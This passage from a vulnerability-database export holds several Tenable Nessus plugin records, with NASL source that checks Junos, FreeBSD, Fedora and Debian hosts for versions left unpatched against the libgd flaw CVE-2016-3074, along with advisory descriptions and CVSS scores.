"https://www.tenable.com/plugins/nessus/102073", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(102073);\n script_version (\"1.4\");\n script_cvs_date(\"Date: 2018/07/13 15:08:46\");\n\n script_cve_id(\"CVE-2016-3074\");\n script_bugtraq_id(87087);\n script_xref(name:\"JSA\", value:\"JSA10798\");\n script_xref(name:\"EDB-ID\", value:\"39736\");\n\n script_name(english:\"Juniper Junos libgd Compressed GD2 Data RCE (JSA10798)\");\n script_summary(english:\"Checks the Junos version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by a remote code execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the remote Juniper\nJunos device is affected by an integer signedness error in the\nincluded GD Graphics Library (libgd) when handling compressed GD2 data\ndue to improper validation of user-supplied input. An unauthenticated,\nremote attacker can exploit this, via specially crafted compressed GD2\ndata, to cause a heap-based buffer overflow, resulting in a denial of\nservice condition or the execution of arbitrary code.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10798\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant Junos software release referenced in Juniper\nsecurity advisory JSA10798.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/04/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/31\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:juniper:junos\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Junos Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"junos_version.nasl\");\n script_require_keys(\"Host/Juniper/JUNOS/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"junos_kb_cmd_func.inc\");\n\nver = get_kb_item_or_exit('Host/Juniper/JUNOS/Version');\n\nfixes = make_array();\n\nfixes['12.1X46'] = '12.1X46-D65';\nfixes['12.3X48'] = '12.3X48-D40';\nfixes['14.2'] = '14.2R8';\nfixes['15.1'] = '15.1R5';\nfixes['15.1X49'] = '15.1X49-D70';\nfixes['15.1X53'] = '15.1X53-D47';\nfixes['16.1'] = '16.1R4';\nfixes['16.2'] = '16.2R2';\n\nfix = check_junos(ver:ver, fixes:fixes, exit_on_fail:TRUE);\n\njunos_report(ver:ver, fix:fix, severity:SECURITY_HOLE);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-06T10:51:34", "description": "The PHP Group reports :\n\n- BCMath :\n\n- Fixed bug #72093 (bcpowmod accepts negative scale and corrupts _one_\ndefinition).\n\n- Exif :\n\n- Fixed bug #72094 (Out of bounds heap read access in exif header\nprocessing).\n\n- GD :\n\n- Fixed bug #71912 (libgd: signedness vulnerability). (CVE-2016-3074)\n\n- Intl :\n\n- Fixed bug #72061 (Out-of-bounds reads in zif_grapheme_stripos with\nnegative offset).\n\n- XML :\n\n- Fixed bug #72099 (xml_parse_into_struct segmentation fault).", "edition": 25, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-03T00:00:00", "title": "FreeBSD : php -- multiple vulnerabilities (5764c634-10d2-11e6-94fa-002590263bf5)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3074"], "modified": "2016-05-03T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:php55-gd", "p-cpe:/a:freebsd:freebsd:php56-bcmath", "p-cpe:/a:freebsd:freebsd:php70", "p-cpe:/a:freebsd:freebsd:php55-xml", "cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:php70-exif", "p-cpe:/a:freebsd:freebsd:php56-gd", "p-cpe:/a:freebsd:freebsd:php70-bcmath", "p-cpe:/a:freebsd:freebsd:php70-xml", "p-cpe:/a:freebsd:freebsd:php70-gd", "p-cpe:/a:freebsd:freebsd:php56-xml", "p-cpe:/a:freebsd:freebsd:php55", "p-cpe:/a:freebsd:freebsd:php56", "p-cpe:/a:freebsd:freebsd:php55-bcmath", "p-cpe:/a:freebsd:freebsd:php55-exif", "p-cpe:/a:freebsd:freebsd:php56-exif"], "id": "FREEBSD_PKG_5764C63410D211E694FA002590263BF5.NASL", "href": "https://www.tenable.com/plugins/nessus/90844", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90844);\n script_version(\"2.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2016-3074\");\n\n script_name(english:\"FreeBSD : php -- multiple vulnerabilities (5764c634-10d2-11e6-94fa-002590263bf5)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The PHP Group reports :\n\n- BCMath :\n\n- Fixed bug #72093 (bcpowmod accepts negative scale and corrupts _one_\ndefinition).\n\n- Exif :\n\n- Fixed bug #72094 (Out of bounds heap read access in exif header\nprocessing).\n\n- GD :\n\n- Fixed bug #71912 (libgd: signedness vulnerability). (CVE-2016-3074)\n\n- Intl :\n\n- Fixed bug #72061 (Out-of-bounds reads in zif_grapheme_stripos with\nnegative offset).\n\n- XML :\n\n- Fixed bug #72099 (xml_parse_into_struct segmentation fault).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=209145\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.php.net/ChangeLog-7.php#7.0.6\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.php.net/ChangeLog-5.php#5.6.21\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.php.net/ChangeLog-5.php#5.5.35\"\n );\n # https://vuxml.freebsd.org/freebsd/5764c634-10d2-11e6-94fa-002590263bf5.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?47b75d01\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php55\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php55-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php55-exif\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php55-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php55-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php56\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php56-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php56-exif\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php56-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php56-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php70\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php70-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php70-exif\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php70-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php70-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/04/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"php70<7.0.6\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php70-bcmath<7.0.6\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php70-exif<7.0.6\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php70-gd<7.0.6\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php70-xml<7.0.6\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php56<5.6.21\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php56-bcmath<5.6.21\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php56-exif<5.6.21\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php56-gd<5.6.21\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php56-xml<5.6.21\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php55<5.5.35\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php55-bcmath<5.5.35\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php55-exif<5.5.35\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php55-gd<5.5.35\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php55-xml<5.5.35\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:14:18", "description": "Security fix for CVE-2016-3074\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 18, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-02T00:00:00", "title": "Fedora 23 : gd-2.1.1-5.fc23 (2016-5f91f43826)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3074"], "modified": "2016-05-02T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:gd", "cpe:/o:fedoraproject:fedora:23"], "id": "FEDORA_2016-5F91F43826.NASL", "href": "https://www.tenable.com/plugins/nessus/90812", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2016-5f91f43826.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90812);\n script_version(\"2.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-3074\");\n script_xref(name:\"FEDORA\", value:\"2016-5f91f43826\");\n\n script_name(english:\"Fedora 23 : gd-2.1.1-5.fc23 (2016-5f91f43826)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2016-3074\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1321893\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2016-April/183263.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?365d1eeb\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected gd package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:gd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:23\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/04/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^23([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 23.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC23\", reference:\"gd-2.1.1-5.fc23\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"gd\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:13:59", "description": "Security fix for CVE-2016-3074\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 18, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-09T00:00:00", "title": "Fedora 24 : gd-2.1.1-7.fc24 (2016-0c57b12c7b)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3074"], "modified": "2016-05-09T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:gd", "cpe:/o:fedoraproject:fedora:24"], "id": "FEDORA_2016-0C57B12C7B.NASL", "href": "https://www.tenable.com/plugins/nessus/90948", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2016-0c57b12c7b.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90948);\n script_version(\"2.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-3074\");\n script_xref(name:\"FEDORA\", value:\"2016-0c57b12c7b\");\n\n script_name(english:\"Fedora 24 : gd-2.1.1-7.fc24 (2016-0c57b12c7b)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2016-3074\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1321893\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2016-May/183724.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ba22b825\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected gd package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:gd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:24\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^24([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 24.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC24\", reference:\"gd-2.1.1-7.fc24\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"gd\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T09:49:34", "description": "Hans Jerry Illikainen discovered that libgd2, a library for\nprogrammatic graphics creation and manipulation, suffers of a\nsignedness vulnerability which may result in a heap overflow when\nprocessing specially crafted compressed gd2 data. A remote attacker\ncan take advantage of this flaw to cause an application using the\nlibgd2 library to crash, or potentially, to execute arbitrary code\nwith the privileges of the user running the application.", "edition": 24, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-04-25T00:00:00", "title": "Debian DSA-3556-1 : libgd2 - security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3074"], "modified": "2016-04-25T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "p-cpe:/a:debian:debian_linux:libgd2", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DSA-3556.NASL", "href": "https://www.tenable.com/plugins/nessus/90688", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3556. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90688);\n script_version(\"2.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-3074\");\n script_xref(name:\"DSA\", value:\"3556\");\n\n script_name(english:\"Debian DSA-3556-1 : libgd2 - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Hans Jerry Illikainen discovered that libgd2, a library for\nprogrammatic graphics creation and manipulation, suffers of a\nsignedness vulnerability which may result in a heap overflow when\nprocessing specially crafted compressed gd2 data. A remote attacker\ncan take advantage of this flaw to cause an application using the\nlibgd2 library to crash, or potentially, to execute arbitrary code\nwith the privileges of the user running the application.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=822242\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/libgd2\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/libgd2\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2016/dsa-3556\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the libgd2 packages.\n\nFor the oldstable distribution (wheezy), this problem has been fixed\nin version 2.0.36~rc1~dfsg-6.1+deb7u2.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 2.1.0-5+deb8u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgd2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/04/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/04/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"libgd-tools\", reference:\"2.0.36~rc1~dfsg-6.1+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libgd2-noxpm\", reference:\"2.0.36~rc1~dfsg-6.1+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libgd2-noxpm-dev\", reference:\"2.0.36~rc1~dfsg-6.1+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libgd2-xpm\", reference:\"2.0.36~rc1~dfsg-6.1+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libgd2-xpm-dev\", reference:\"2.0.36~rc1~dfsg-6.1+deb7u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libgd-dbg\", reference:\"2.1.0-5+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libgd-dev\", reference:\"2.1.0-5+deb8u1\")) flag++;\nif 